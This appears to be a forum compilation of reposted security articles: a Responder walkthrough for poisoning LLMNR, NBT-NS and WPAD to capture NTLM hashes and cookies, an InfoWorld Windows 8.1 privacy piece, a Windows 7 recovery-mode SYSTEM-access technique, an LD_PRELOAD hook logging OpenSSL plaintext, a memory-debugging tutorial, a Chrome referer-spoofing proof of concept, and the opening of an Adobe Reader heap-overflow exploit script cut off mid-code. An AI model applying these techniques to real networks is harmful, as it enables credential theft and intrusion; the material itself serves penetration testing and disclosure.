Owning Windows Networks with Responder 1.7 A lot has been happening with Responder lately! Everything is still written in pure python for portability’s sake, there's no need to install any third-party libraries. For starters, Responder is a passive credentials gathering tool. It listens for specific NBT-NS (NetBIOS Name Service) and LLMNR (Link-local Multicast Name Resolution) queries and poisons the issuer. Responder has several rogue authentication servers listening on several UDP and TCP ports. If you want more information on LLMNR &NBT-NS poisoning, read my previous blog post: Introducing Responder-1.0 - SpiderLabs Anterior New Functionalities in Responder: - Rogue SMB server now makes use of SMB Extended Security NTLMSSP authentication (NTLMv1/v2) by default, so you won't miss a hash! - Rogue FTP server clear text credential capture module (enabled by default). - Small DNS server (enabled by default). - ICMP Redirects utility for Windows =< 5.2 Domain members. - Stealth mode Domain Controller finder (enabled by default). - Host Fingerprint module (need to specify -f On). - All activity is now logged into a file named Responder-Session.log with date and time for each entry. - Ability to switch On/Off any rogue server via command line. - Ability to specify a different challenge for all NTLM rogue servers. - NT4 specific SMB clear text credentials support. Responder 1.7 in action: ICMP Redirect for Windows =< 5.2 Domain members: Windows =< 5.2 Domain members (XP, Windows server 2003 and above) have ICMP Redirect enabled by default. This functionality can be used to remotely add (with no authentication required) a new route for a given host. Yes, you heard me right. Case scenario example: Attacker has IP address 192.168.2.10 Domain controller has IP address 192.168.3.58, which is also the primary DNS server. Victim workstation has IP address 192.168.2.39 Gateway has IP address 192.168.2.1 This screenshot reflects the victim default route prior using Responder ICMP Redirect utility: So we start by disabling outgoing ICMP requests: We launch Responder Icmp-Redirect.py utility accordingly: Back to XP domain member route configuration: Now we can create a NAT firewall rule and answer all DNS queries for 192.168.3.58 from 192.168.2.39 by issuing this command as root : iptables -t nat -A PREROUTING -p udp --dst 192.168.3.58 --dport 53 -j DNAT --to-destination 192.168.2.10:53 From there, Responder will reply to DNS requests and make use of its rogue authentication servers: Stealth Domain Controller Finder: Responder has a Browser listener (UDP 138) and waits for Domain Master Browser (DMB) Announcements. In a Windows NT domain context, only the Primary Domain Controller can be the DMB according to Microsoft documentation. If there's no domain set and workstations are in a Workgroup, usually the Local Master Browser (LMB) will be the DMB. In this example, Responder is simply listening on port UDP 138: OS fingerprint module: When enabled, the fingerprint module will fingerprint any host who issued either an LLMNR or NBT-NS query : FTP credential module: This module will grab plaintext FTP credentials: Final words: Apart from the fact that with its internal components Responder is a great tool to gather encrypted or clear text credentials passively, it can also be combined with ARP spoofing attacks in order to amplify its results. As always, latest version is available here : https://github.com/SpiderLabs/Responder Owning Windows Networks With Responder Part 2 One of the great things about working within SpiderLabs is that we prefer to use our own tools whenever possible. The biggest advantage to using your own toolset is lot more control over what's happening during the testing process; helping to avoid any nasty side effects. It also provides a better insight into vulnerabilities and where best they can be used. For these reasons there has been a lot of support from my colleagues on the SpiderLabs network pentest team for Responder. Another advantage is the ability to greatly shorten the feedback/development loop. New Responder features have been suggested by members of the pentest team and we've been able to test then deploy them into the field that same day. New Functionalities in Responder: Built-in proxy server, supporting NTLMSSP and Basic authentication scheme. This proxy is listening on port TCP 3141 and can be switched to on/off.? The HTTP server was updated to handle WPAD requests. Built-in LDAP rogue server supporting NTLMSSP and Simple Bind (clear text) authentication schemes. This module can be combined with the ICMP-Redirect utility and the DNS server to be reliably effective. How WPAD works: WPAD in a corporate Windows environment is used to automatically configure Internet Explorer proxy settings. This functionality is enabled by default on all Windows release since Windows 2000.? WPAD setup can be boiled down like this: If no wpad file was specified in a DHCP-INFORM packet (opcode 252), a DNS type A query will be issued for wpad, if DNS fail, then Link-local Multicast Name Resolution (LLMNR) will be used on Windows >= Vista, if it fail again then NetBIOS Name Service (NBT-NS) will be used.? Once the WPAD server is found, the client will initiate an HTTP GET request and retrieve /wpad.dat file which is a javascript like file. This file is meant to contain basic or advanced proxy usage directives.? Once this file is retrieved, Internet Explorer will use the retrieved settings and connect to the proxy server for all HTTP requests.? This website provides a good guide on how to implement your wpad.dat files for your needs. Abusing the WPAD functionality, the Responder way: In this release, responder takes care of Web Proxy Autodiscovery Protocol (WPAD) requests. Responder will answer to WPAD LLMNR, NBT-NS queries and provide a wpad.dat file. The javascript payload used is pretty simple: function FindProxyForURL(url, host) { return 'PROXY wpadwpadwpad:3141; DIRECT'; }? This function contains the following directives: Use a proxy server for all connections. Responder proxy server is set to wpadwpadwpad:3141 If this proxy server fails for whatever reason, then access the website directly. Once Internet Explorer retrieves this file, all connections will be redirected to Responder proxy server. It can be noted that no IP address is specified for this proxy but a local name (wpadwpadwpad) and there's a reason for that: We want to have this local name to be queried via LLMNR or NBT-NS, which Responder will resolve. Once this Local Intranet Zone (LIZ) name is resolved, Internet Explorer will connect to Responder and send its NTLM hashes transparently with no password prompt. The second trick is to abruptly reset the HTTP connection upon receiving Internet Explorer’s last NTLM packet exchange (NTLMSSP_AUTH) which contains the NTLM credentials. This allows us to fake a proxy failure so IE will simply connect directly to the website it requested. The cool catch in this is that for each connection IE will try to reuse the proxy even if it failed before. This means that Responder is able to catch the cookies for each web request transparently. This screenshot demonstrates what happens when you open Internet Explorer on a Windows Server 2008R2 Domain Controller by default: Since everything works well, the user continues to browse online : As it can be noted, Responder was able to grab the cookies for google.com and msn.ca and the currently logged in user NTLM credentials. In this video, you can see Responder 1.9 taking advantage of WPAD: Since a lot of cookies can be gathered while using Responder, they are now stored in a folder named HTTPCookies. Sursa: Owning Windows Networks with Responder 1.7 - SpiderLabs Anterior Sursa: Owning Windows Networks With Responder Part 2 - SpiderLabs Anterior

A look at the black underbelly of Windows 8.1 'Blue' Pieces of Windows 8 inexplicably didn't survive jump to Windows 8.1, and new feature allows Microsoft to track your local searches By Woody Leonhard | InfoWorld As Windows 8.1 Milestone Preview testers push and prod their way into the dark corners of Windows 8.1 "Blue," they're finding a bunch of things that go bump in the night. From new and likely unwelcome features, to nudges into the Microsoft data tracking sphere, to entire lopped-off pieces of Windows 8, it looks like Microsoft is changing Windows to further its own agenda. I'm not talking about the well-documented gotchas with the Win 8.1 Preview -- Microsoft makes no bones about the fact you won't be able to upgrade directly from the Preview to the final, shipping version of Windows 8.1, for example, and it warns repeatedly that you can't uninstall the Milestone Preview. I'm also not talking about typical beta blues -- clicking on a Metro app button and getting dumped back on the Metro Start screen kind of comes with the beta-testing ride. Nor am I talking about the updates to the Preview that have already shipped: I count 10 installed on my 64-bit test machine through Windows Update (not bad for a beta that's only been out for a couple of weeks). The changes I'm seeing are more ... inscrutable. Some people think they're sinister. Few of them have even a wisp of documentation. We potential Windows 8.1 customers are left trying to figure out what Microsoft intends to do and how the changes will affect the way we work. Microsoft Accounts bare its fangs With Windows 8, you're encouraged to setup every new Windows user with a Microsoft Account -- which is to say, it's easy to set up a new user by employing an email address that's been registered with Microsoft. It's possible to create a new Win8 user without providing a Microsoft Account, but you need to click a few rather obscure links in the setup routine to get around the restriction. On the other hand, it's very difficult to install Windows 8.1 "Blue" Preview without using a Microsoft Account. While there are some clever workarounds to bypass the forced Microsoft Account login, you have to be quite persistent to get the Preview installed without linking your installation -- your computer's unique ID -- to your Microsoft Account. Microsoft says that the Microsoft Account requirement will be lifted for the final release: Warning In order to use Windows 8.1 Preview you must sign in to your PC with a Microsoft account. The option to create a local account will be made available at the final release of Windows 8.1. But there are no details about how the requirement will be lifted or whether the same hoops that worked with Windows 8 will work with the final version of Windows 8.1 Microsoft can track your local searches If you use Microsoft Bing or Google search -- or almost any other search engine -- you already know that Microsoft and/or Google can and do keep track of your searches. That's why a casual Web search for "flugelhorn" will result in you seeing targeted ads for flugelhorns on almost every site you visit for the following month. But running a search on your computer for "flugelhorn" through the Windows 8 Search charm doesn't increase your chances of seeing online ads for flugelhorns -- I think. Although I can't find a suitable legalistic disclaimer anywhere, Microsoft doesn't appear to be scraping, storing, and regurgitating local computer search strings to, uh, enhance your shopping experience. That's changing by default in Windows 8.1. The new Win8.1 Smart Search -- invoked by default through the Windows 8.1 Search charm -- not only searches your computer for the string you specify. It also, all by itself, gathers up the terms and runs them through a Bing search. Making this cool new feature all the more lovable, Microsoft has officially announced that advertisers will be able to dish up advertising to your computer, based on the searches you perform on your computer. Bing Ads will be an integral part of the new Windows 8.1 Smart Search experience. Now, with a single campaign setup, advertisers can connect with consumers across Bing, Yahoo, and the new Windows Search with highly relevant ads for their search queries. In addition, Bing Ads will include Web previews of websites and the latest features like site links, location, and call extensions, making it easier for consumers to complete tasks and for advertisers to drive qualified leads. Unless you make Smart Search dumb, you not only hand Microsoft a complete history of all of your local computer search terms, you open your machine up to even more lovely ads, doled out on the Search results pane. If you search for "flugelhorn" on your local computer -- not on the Web, mind you, but on your own computer -- the results that Windows 8.1 shows you will include advertisements for flugelhorns on eBay and Amazon (no, I'm not joking -- try it), local flugelhorn manufacturers, flugelhorn party consultants, and no doubt some day flugelhorn addiction services. You can turn Smart Search off by bringing up the Settings charm, clicking or tapping Change PC Settings, then choosing Search and Apps, and moving the Use Bing to Search Online slider off. The Windows Experience Index bites the dust -- or does it? If you look for the Windows Experience Index in the Windows 8.1 "Blue" Preview, you won't find it. While nobody ever took WEI too seriously -- it's a bit preposterous to think that you can distill a PC's performance down to a single number -- I've long used WEIs to quickly compare computers while I'm out shopping. They're also useful to double-check on new drivers, to see if they've boosted or strangled processing speeds. Nobody knows for sure -- and Microsoft hasn't commented at all -- but it appears the WEI is dead. Nazmus Khandaker on the McAkins Online blog puts it this way: Microsoft removed the Experience Index from Windows RT but kept it on the original release of Windows 8 in October 2012. However with Windows 8.1, Microsoft has decided to kill off the Experience Index completely. I have tested this on several PCs (touch and nontouch). Before upgrading my PCs, I was able to view the Experience Index on Windows 8.0. After upgrading to Windows 8.1, they were no longer present. One possible reason for its sudden disappearance: The lofty and expensive Microsoft Surface Pro gets a 5.6 on the WEI scale. That would've been a good score three or four years ago on a middle-of-the-road PC. I have an old single-core i3 machine with a Windows 8 WEI of 7.0. The Metro Photos app loses its connections The Windows 8.1 Metro Photos app that's circulating at the moment is a mess. While it sports a few new features -- crop, rotate, auto slideshows, red-eye removal, all the features you would've expected from a photo app 10 years ago -- the current app can't even access photos stored on a network share or on SkyDrive. Clearly, it was rushed out the door. The reason for the trampled release appears to be Microsoft's canning of its Facebook and Flickr links. Windows 8 had automatic connections to your local pictures library, network shares, SkyDrive, Facebook, and Flickr; Win8 combines photos from all of those sources and offers them up with one, unified view. The Windows 8.1 "Blue" Preview can only get at local pictures. It uses the cumbersome-but-finger-friendly "file picker" metaphor for selecting files and folders. Barb Bowman, community moderator for Microsoft's Answers forum and a Microsoft MVP, took Microsoft to task: Photos App in 8.1 loses most of its best features, e.g., Facebook/Flickr support, network/homegroup support. I've just installed the 8.1 Preview on a desktop. The Photos App has changed: 1. No longer includes the ability to show images from Facebook, Flickr, SkyDrive 2. No longer allows images from other computers or the network Microsoft hasn't responded officially to the burgeoning complaints, although a person who identified herself as Microsoft employee CarmenZ posted this in response: In Windows 8, we wanted to provide a way for folks to view their photos on other services knowing there would be few (if any) apps in the store at launch that would do so. Now there are many apps in the store that offer ways to view photos on other services and soon there will even be a Facebook app from Facebook. We’re confident Facebook will offer great ways to view and engage socially with photos on Facebook. We welcome Flickr to do the same. In addition, the People app still offers the ability to socially engage with your friends and even your own photos. Undeterred, Bowman fired back: This morning I was sending a tweet in a Windows 8[.1] App and when I used the image button, the Photos App opened (and not Windows Explorer, which is what happens on RTM W8) and was able to attach a file from a networked computer. This is more evidence that the Photos App is part of the OS and not an app ... Since the navigation is there, as evidenced by my experience, the question remains as to why there is no support for network folders in the Photos app itself. Microsoft has responded on the Facebook issue on the original thread, but has pointedly not answered the other questions. If I were to speculate, I'd say that Microsoft ripped out the Facebook and Flickr parts of Metro Photos and, in a hurry, took out SkyDrive and network folder support. It's inconceivable to me that Microsoft would release a Metro Photos app without copious connections to SkyDrive -- if only to sell more SkyDrive space. About the same time this observation hit the fan, Microsoft announced, quite unexpectedly, that Facebook would finally build a Metro Facebook app. I think we're seeing a quid pro quo in action -- Facebook finally agrees to join the Windows Store and, in exchange, Microsoft agrees to drop Facebook integration from Metro Photos. If true, might other Microsoft Metro apps follow suit? And where's the Metro Flickr app? Times really have changed if Facebook can arm-wrestle Microsoft into submission. (Thanks for the heads-up, AR.) This story, "A look at the black underbelly of Windows 8.1 'Blue'," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: A look at the black underbelly of Windows 8.1 'Blue' | Microsoft windows - InfoWorld

[h=1]The Psychology of C# Analysis[/h] [h=2]by Coverity on Jul 08, 2013[/h] 3,695 views Our C# expert Eric Lippert provides his take on the psychology of C# analysis, including the business case for C#, developer characteristics and analysis tools. Prezentare: The Psychology of C# Analysis

[h=3]Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required[/h] Just wanted to share with you the below, which I have already communicated with Microsoft - according to MSRC team "An attacker with unrestricted physical access can certainly manipulate a system in multiple ways. This is not something we consider a security vulnerability." thus no CVE "Computer owners should provide for physical security of systems as part of best practices. There is more discussion of physical access in the "10 Immutable Laws of Security" (Ten Immutable Laws Of Security (Version 2.0)) under Law #3". The scenario is as follows: Windows 7 SP1, and Workstation with BIOS settings to restrict boot up from CD, and Workstation joined in Windows Active Directory or Standalone By forcing the machine to boot or shutdown abnormally (eg pressing the ctl+alt+del during bootup or press the power button (kill) during shutdown) Windows will enter the "Windows Error Recovery" menu asking us whether we wish to "Launch startup Repair (recommended)" or "Start Windows Normally" Select the "Launch Startup Repair (recommended)" Recovery process will display a "Windows is loading files...." message, then after a while we enter the "Startup Repair" process (graphical interface) A message might appear asking you if you want to "Restore your computer using System Restore", select Cancel, if it does. Shortly, a new message box will come up prompting us "Send information about the problem (recommended)" or "Don't send" and at the bottom of this dialog box the option with label "View problem details" exist. Click on "View problem details", you will get information such as "Problem signature" and more. Note that at the very bottom of this textarea a link exists which points to the X (temporary RAMDISK) drive (X:\windows\system32\en-US\erofflps.txt), Clicking on the link; Notepad launches. From there, one can go to File | Open view all contents of the C/D/X/etc drive, copy files to/from different locations/drives (copy files from others' C:\documents and settings\* profiles, Documents, Desktop etc), create files, launch cmd.exe. As you may have guessed all cmd commands will run from X's ramdrive context, which means you cannot just "net user newuser password /add && net localgroup administrators newuser /add" and expect newuser be there on next reboot), you may though backdoor C's Windows through other techniques;) and manipulate the filesystem as "nt authority\system", you have the full control, you are not limited. Through ms-dos prompt we noticed we had been granted with "nt authority\system" privileges which makes sense having so, to perform the recovery operation, but it's too easily for anyone to abuse them providing he has casual physical access (eg in environments such as libraries, universities, offices, reception front desks etc; I will leave your imagination from this point to work:) The above scenario is also valid if you boot the workstation using the Windows 7 Repair Disc (condition #2 "Workstation with BIOS settings to restrict boot up from CD" should not be met), at some point a Windows "System Recovery Options" dialog box will prompt you to "Load Drivers" use that option to nagivate the OS and own the host. General note: If you enter Recovery Mode by pressing F9->F8->Repair Your Computer at boot time you will not be able to reproduce the process, as Windows WILL prompt you for credentials. You have to cause an abnormal shutdown (killing windows loading process will also do), or use the Windows 7 Repair Disc. As probably others may agree with me, "nt authority\system" access should not be so easy given (or acquired by default, design, whatever, name it), at a minimum a password prompt or other control should exist to prevent the ownage. Sursa: IntelComms: Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required

[h=1]Function Hooking Part I: Hooking Shared Library Function Calls in Linux[/h] [h=2]Justin Kettner[/h] [h=3]July 1, 2013[/h] When assessing an application for weaknesses in a linux environment, we won’t always have the luxury of freely available source code or documentation. As a result, these situations require more of a black box approach where much of the information about the application will be revealed by attempting to monitor things such as network communications, calls to cryptographic functions, and file I/O. One method of monitoring applications to extract information is to attach a debugger, such as GDB, to the process and to dump register or stack values as breakpoints are hit for the desired function calls. While this has the advantage of giving fine grained control over things such as code flow and register contents, it is also a cumbersome process compared to hooking the function calls of interest to modify their behavior. Function call hooking refers to a range of techniques used to intercept calls to pre-existing functions and wrap around them to modify the function’s behavior at runtime. In this article we’ll be focusing on function hooking in linux using the dynamic loader API, which allows us to dynamically load and execute calls from shared libraries on the system at runtime, and allows us to wrap around existing functions by making use of the LD_PRELOAD environment variable. The LD_PRELOAD environment variable is used to specify a shared library that is to be loaded first by the loader. Loading our shared library first enables us to intercept function calls and using the dynamic loader API we can bind the originally intended function to a function pointer and pass the original arguments through it, effectively wrapping the function call. Let’s use the ubiquitous “hello world” demonstration as an example. In this example we’ll intercept the puts function and change the output. Here’s our helloworld.c file: #include <stdio.h> #include <unistd.h> int main() { puts(“Hello world!\n”); return 0; } Here’s our libexample.c file: #include <stdio.h> #include <unistd.h> #include <dlfcn.h> int puts(const char *message) { int (*new_puts)(const char *message); int result; new_puts = dlsym(RTLD_NEXT, “puts”); if(strcmp(message, “Hello world!\n”) == 0) { result = new_puts(“Goodbye, cruel world!\n”); } else { result = new_puts(message); } return result; } Let’s take a moment to examine what’s going on here in our libexample.c file: Line 5 contains our puts function declaration. To intercept the original puts we define a function with the exact same name and function signature as the original libc puts function. Line 7 declares the function pointer new_puts that will point to the originally intended puts function. As before with the intercepting function declaration this pointer’s function signature must match the function signature of puts. Line 10 initializes our function pointer using the dlsym() function. The RTLD_NEXT enum tells the dynamic loader API that we want to return the next instance of the function associated with the second argument (in this case puts) in the load order. We compare the argument passed to our puts hook against “Hello world!\n” on line 12 and if it matches, we replace it with “Goodbye, cruel world!\n”. If the two strings do not match we simply pass the original message on to puts on line 14. Now let’s build everything and test it out: sigma@ubuntu:~/code$ gcc helloworld.c -o helloworld sigma@ubuntu:~/code$ gcc libexample.c -o libexample.so -fPIC -shared -ldl -D_GNU_SOURCE sigma@ubuntu:~/code$ First we compile helloworld.c as one normally would. Next we compile libexample.c into a shared library by specifying the -shared and -fPIC compile flags and link against libdl using the -ldl flag. The -D_GNU_SOURCE flag is specified to satisfy #ifdef conditions that allow us to use the RTLD_NEXT enum. Optionally this flag can be replaced by adding “#define _GNU_SOURCE” somewhere near the top of our libexample.c file. After compiling our source files, we set the LD_PRELOAD environment variable to point to the location of our newly created shared library. sigma@ubuntu:~/code$ export LD_PRELOAD=”/home/sigma/code/libexample.so” After setting LD_PRELOAD we’re ready to run our helloworld binary. Executing the binary produces the following output: sigma@ubuntu:~/code$ ./helloworld Goodbye, cruel world! sigma@ubuntu:~/code$ As expected, when our helloworld binary is executed the puts function is intercepted and “Goodbye, cruel world!” rather than the original “Hello world!” string is displayed. Now that we’re familiar with the process of hooking function calls let’s apply it towards a bit more practical example. Let’s pretend for a moment that we have an application that we are assessing and that this application uses OpenSSL to encrypt communications of sensitive data. Let’s also assume that attempts to man-in-the-middle these communications at the network level have been fruitless. To get at this sensitive data we will intercept calls to SSL_write, the function responsible for encrypting then sending data over a socket. Intercepting SSL_write will allow us to log the string sent to the function and pass the original parameters along, effectively bypassing the encryption protections while allowing the application to run normally. To get started let’s take a look at the SSL_write function definition: int SSL_write(SSL *ssl, const void *buf, int num); Here’s the code I’ve written to intercept SSL_write in hook.c: #include <stdio.h> #include <unistd.h> #include <dlfcn.h> #include <openssl/ssl.h> int SSL_write(SSL *context, const void *buffer, int bytes) { int (*new_ssl_write)(SSL *context, const void *buffer, int bytes); new_ssl_write = dlsym(RTLD_NEXT, “SSL_write”); FILE *logfile = fopen(“logfile”, “a+”); fprintf(logfile, “Process %d:\n\n%s\n\n\n”, getpid(), (char *)buffer); fclose(logfile); return new_ssl_write(context, buffer, bytes); } As we can see our function definition needs to return an integer and take three arguments: a pointer to an SSL context, a pointer to a buffer containing the string to encrypt, and the number of bytes to write. In addition to our intercepting function definition we define a matching function pointer that will point to the originally intended SSL_write function and initialize it with the dlsym function. After pointing our pointer to the original function, we log the process ID of the process calling SSL_write, and the string sent to it. Next we compile our source to a shared library: sigma@ubuntu:~/code$ gcc hook.c -o libhook.so -fPIC -shared -lssl -D_GNU_SOURCE sigma@ubuntu:~/code$ The only difference between this compilation and last is the -lssl flag, which we specify in order to link our code against the OpenSSL library. Now let’s go ahead and set LD_PRELOAD to point to our newly created libhook library: sigma@ubuntu:~/code$ export LD_PRELOAD=”/home/sigma/code/libhook.so” sigma@ubuntu:~/code$ Now that LD_PRELOAD is set we’re ready to start intercepting calls to SSL_write on processes executed from here onward. To test this let’s go ahead and use the curl utility over HTTPS and intercept the HTTPS request. sigma@ubuntu:~/code$ curl https://www.netspi.com > /dev/null % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 19086 0 19086 0 0 37437 0 –:–:– –:–:– –:–:– 60590 sigma@ubuntu:~/code$ After successful completion of the command there should be a log file that we can examine: sigma@ubuntu:~/code$ cat logfile Process 11423: GET / HTTP/1.1 User-Agent: curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 Host: www.netspi.com Accept: */* sigma@ubuntu:~/code$ As we can see the request has been logged in plaintext, while the application was allowed to function normally. Had this been a scenario where data integrity relied heavily upon SSL encryption and the assumption that man-in-the-middle attacks would be occurring only at the network level, any such integrity would have been compromised. These are really just a few examples of what’s possible using the dynamic loader API and LD_PRELOAD. Since the shared library we create will be loaded into the running process’ memory space we could do things like dump the memory of the process to examine the memory at runtime or tamper with runtime variables. Other uses for this method of function call hooking and loading generally fall under the use case of user-land rootkits and malware, which will be the focus on the next article in this series. Sursa: https://www.netspi.com/blog/2013/07/01/function-hooking-part-i-hooking-shared-library-function-calls-in-linux/

[h=1]Memory Corruption – Debugging Tools in Linux[/h] 13 hours ago by Rupali 0 In part I, we learnt about the memory corruption and the probable causes. Presently, there are plethora Linux tools available to combat the issues of memory corruption. Such Linux tools assist a great deal in detecting the memory corruption and resolving them. In this article we will cover 3 popular open source tools available for debugging memory corruption related problem on Linux. NOTE – Information related to installation of debugging tools is Ubuntu specific. [h=2]Memory Corruption Debugging Tools[/h] [h=3]1. Electric Fence[/h] Electric Fence is a memory debugger, or sometimes also called malloc debugger as it detects memory corruption related to memory allocated by malloc(). It excels in detecting two kinds of programming issues related to heap memory corruption The buffer overrun of a memory allocated by ‘malloc()’ Access to memory that has been freed by ‘free()’. Well, electric fence will detect even a read access, along with the write. The way it helps is, we run our executable in a debugger along with electric fence. and electric fence will make the program error at the point either where the buffer is going out of bounds of malloc-ed boundaries, or any access to a memory already freed. Hence, this way we come to know (with the error thrown by electric fence) about the statement attempting to corrupt a memory. In all, the crash point is moved to the precise point of the first invalid memory write/read and hence helping us to determine where memory corruption is taking place. Well, the way things change is, with gdb we’ll see the crash wherever it happens, but with efence, the crash location changes to where the corruption happens. To begin with, we will see how to set up electric fence. The following command works on Ubuntu system to install the open source tool. $ sudo apt-get install electric-fence However, one can also install electric-fence through synaptic or aptitude. Once installed, one can see that it is a library which contains overloaded definitions of malloc(), free(), calloc(), and other such memory related api’s which are generally available in libc. The way it works is, efence places an inaccessible page after each memory block allocated by ‘malloc()’. And for which it has to use the virtual memory hardware of the system. Once, we go beyond the allocated memory, it will come to know the invalid access and will trigger the error. To use electric fence, just compile the sources with ‘-g’ debug option and link it to the efence library. Lets take our old heap corruption example, which looks like, #include <stdio.h> #include <stdlib.h> int main() { int *pData = NULL; int num = 12; pData = (int*) malloc (num * sizeof (int)); //...do stuff use the memory free(pData); pData[0] = -1; pData = (int*) malloc (num * sizeof (int)); //...do stuff use the memory free(pData); return 0; } Here is how we compile the executable now using efence . $ gcc -g -Wall heapcorrupt.c -o heapcorrupt -lefence Its essential to understand in the above linking, that we are asking the final built executable to use symbols ‘malloc’ and ‘free’ from the libefence library rather than libc. For me, libefence library is place at /usr/lib/ In certain cases, if gcc is still using libc definitions, try giving the path to the library in the compilation options. Lets confirm, if our binary is using the required ‘malloc’ and ‘free’ symbols through ‘nm’ tool, which lists all the symbols. $ nm -a heapcorrupt | grep malloc U malloc Articol complet: http://mylinuxbook.com/debugging-linux-memory-corruption/

NTLM Authentication Library 1.4 Authored by Grant Edwards | Site josefsson.org The NTLM library contains utilities for authenticating against Microsoft servers that require NTLM authentication. The goal of this project is to make libntlm easier to build (by using autoconf, automake, and libtool) for use by other projects. Download: http://packetstormsecurity.com/files/download/122321/libntlm-1.4.tar.gz Sursa: NTLM Authentication Library 1.4 ? Packet Storm

[h=1]It's Too Late—Malware Has Already Won[/h]Published: Friday, 5 Jul 2013 | 9:55 AM ET By: Gaurav Banga, Co-founder and CEO of Bromium Our society has never before had so much valuable data online, nor been so poorly protected. The barbarians are at the gate. To change the odds, chief information security officers (CISOs) will need to do things differently, take a few risks and adopt new approaches to secure the enterprise. The current approach has failed, and "more of the same" will not suffice. The CISO of a Fortune 50 company recently shared with me that their approach to solve the problem of advanced persistent threats was to "mandate two of every security product from different vendors," from firewalls to intrusion detection and prevention systems—and in doing so gain "defense in depth." Certainly the organization doubled its costs, but is it now measurably more secure? No. "Defense in depth" is a term used too often in hope, when in fact we are facing a "phase shift" in the technology and approaches used by attackers. Imagine that you have a pot of water on the stove. It gets hotter and hotter, but it's still water. But there's a fascinating point where the addition of a single joule of energy transforms water to steam: a phase shift. If your approach involves finding ways to contain water (bigger/better pots, for example) a phase shift to steam is a very big deal. In fact, you're probably out of luck. The water in our pot has turned to steam and is escaping: It is impossible to build a malware detector that can keep up with advanced polymorphic malware—either at the network perimeter, or at the endpoint. This is a simple restatement of the Halting Problem, proven in 1936 by Alan Turing (who is considered to be the father of the field of computer science)—there can be no general procedure to decide if a self-contained computer program will eventually halt. Moreover, detection is vastly different from protection. Putting a lid on the pot will not contain the steam, and might well lead to an explosion. Many enterprise compromises that are discovered are found weeks or months after the attack—giving attackers plenty of time to further penetrate the infrastructure and steal data. We need a phase shift in our approach to the problem of endpoint security. Every device must be able to protect itself "in the wild"—away from the traditional enterprise network perimeter. Users are increasingly mobile, accessing applications from untrusted networks and over the Web, and will make mistakes and click on the wrong things. And a broader trend, toward consumerization of the endpoint, means that user-owned devices will increasingly be used for work. The phase shift that is needed will deliver endpoints that are secure by design.This will result from hardware enforced isolation, rather than from software-based detection. Hardware-protected devices can use attestation to ensure that an endpoint initializes to a known-good state. In addition, new approaches, such as Bromium micro-virtualization, allow hardware to protect applications, the operating system and data at runtime, to extract and analyze malware for incident response, and to make endpoints self-remediating. The enterprise security landscape is changing profoundly. CISOs must take bold steps forward to adopt new practices to dramatically reduce enterprise insecurity: new OS versions, automated OS and application patching, encryption, and hardware-based protection are vital in a consumer oriented world where devices access cloud-based applications directly, and where the attacker has access to massive computing power. —By Gaurav Banga, co-founder and CEO of Bromium. Sursa: It's Too Late—Malware Has Already Won

Google Chrome 25.0.1364.152 HTTP Referer Header Faking Authored by Liad Mizrachi Advisory: XMLHttpRequest HTTP Referer Header Faking Author: Liad Mizrachi Vendor URL: http://www.chromium.org/ Vulnerability Status: Fixed Application Version: Google Chrome v25.0.1364.152 ========================== Vulnerability Description ========================== Chromium is the open source web browser project from which Google Chrome draws its source code. Chromium fails to validate the use of unsafe headers when the page is load from the local drive, allowing to set and change the referer header using "setRequestHeader" when generating a Ajax (XMLHttpRequest) request. ========================== PoC ========================== function SendReq() { var xmlhttp = new XmlHttpRequest(); xmlHttp.onreadystatechange = readyStateChanged; xmlHttp.open("GET", "http://AnySite.com/checkReferer.php", true); xmlHttp.setRequestHeader("Referer", "http://valid.referer.com"); xmlHttp.send(); } ========================== Solution ========================== Block all scripts from setting unsafe headers in XMLHttpRequest. - Fixed by vendor. ========================== Disclosure Timeline ========================== 04-Mar-2013 - Google Security Team informed by mail. 14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open source project, please file the report directly in their bug tracker" 14-Mar-2013 - Security Bug Opened @ Chromium project. 30-Apr-2013 - Fixed. ========================== References ========================== http://www.chromium.org/ https://codereview.chromium.org/13979011/ Sursa: Google Chrome 25.0.1364.152 HTTP Referer Header Faking ? Packet Storm

[h=1]Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption[/h] ''' Title: Adobe Reader X BMP/RLE heap corruption Product: Adobe Reader X Version: 10.x Product Homepage: adobe.com Binary affected: AcroForm.api Binary Version: 10.1.4.38 Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841 Configuration Requirements ----------------------------------------- Default configuration. Vulnerability Requirements ----------------------------------------- None. Vulnerability Description ----------------------------------------- Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow. Vulnerability WorkAround (if possible) ----------------------------------------- Delete AcroForm.api ''' from hashlib import md5 import sys, struct ######### Begin of the miniPDF import zlib #For constructing a minimal pdf file ## PDF REference 3rd edition:: 3.2 Objects class PDFObject: def __init__(self): self.n=None self.v=None def __str__(self): raise Exception("Fail") ## PDF REference 3rd edition:: 3.2.1 Booleans Objects class PDFBool(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): if self.s: return "true" return "false" ## PDF REference 3rd edition:: 3.2.2 Numeric Objects class PDFNum(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "%s"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects class PDFString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings class PDFHexString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">" ## A convenient type of literal Strings class PDFOctalString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s="".join(["\\%03o"%ord(c) for c in s]) def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.4 Name Objects class PDFName(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "/%s"%self.s ## PDF REference 3rd edition:: 3.2.5 Array Objects class PDFArray(PDFObject): def __init__(self,s): 